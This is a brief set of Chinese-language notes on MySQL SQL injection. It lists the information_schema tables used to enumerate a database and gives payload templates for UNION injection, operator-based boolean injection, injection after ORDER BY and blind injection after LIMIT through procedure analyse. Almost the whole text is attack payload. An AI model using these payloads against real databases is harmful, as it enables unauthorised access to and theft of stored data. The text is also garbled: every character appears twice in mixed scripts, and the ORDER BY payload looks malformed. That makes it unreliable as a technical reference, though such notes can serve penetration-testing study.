元數(shù)據(jù)庫(kù)：information_schema

表庫(kù) information_schema.tables

數(shù)據(jù)庫(kù)名 schema_name

表名 table_name

列庫(kù) information_schema.columns

數(shù)據(jù)庫(kù)名 schema_name

表名 table_name

列名 column_name

庫(kù)庫(kù) information_schema.schemata

數(shù)據(jù)庫(kù)名 schema_name

聯(lián)合注入

UNION SELECT * FROM XXX.XXX

計(jì)算注入

SELECT * FROM XXX WHERE xx = 1[ && || and or ?| & ^ ]

ORDER BY后注入

SELECT * FROM XXX WHERE xxx = xxx order by 11 ^ exp(BOOL EXP, 1, ~1)

LIMIT后注入

SELECT * FROM XXX LIMIT 1,2 procedure analyse(num1, num2)

procedure analyses會(huì)對(duì)當(dāng)前數(shù)據(jù)庫(kù)給出優(yōu)化建議，且它可以跟在limit后面，我們只需要在num1和num2上配合盲注即可